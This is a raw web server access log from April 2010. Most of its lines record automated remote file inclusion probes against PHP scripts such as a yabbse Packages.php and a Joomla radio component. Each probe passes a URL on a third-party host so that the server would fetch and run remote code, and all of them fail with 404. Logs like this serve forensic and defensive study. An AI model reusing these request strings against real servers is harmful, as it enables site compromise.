217.73.226.51 - - [07/Apr/2010:05:39:03 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:39:05 -0400] "GET /logs/error_log.Q109100900//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:39:05 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:39:06 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.833"
72.46.157.102 - - [07/Apr/2010:05:39:21 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:05:39:21 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:05:39:21 -0400] "GET /logs/error_log.Q109051500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:05:39:38 -0400] "GET /images/_notes/circle_convention_off.jpg.mno HTTP/1.1" 200 197 "-" "Yandex/1.01.001 (compatible; Win16; I)"
209.216.43.133 - - [07/Apr/2010:05:39:54 -0400] "GET /index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:39:54 -0400] "GET /logs/access_log.Q109121500/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:39:54 -0400] "GET /logs/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:39:55 -0400] "GET /index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:39:55 -0400] "GET /logs/access_log.Q109121500/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:39:55 -0400] "GET /logs/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
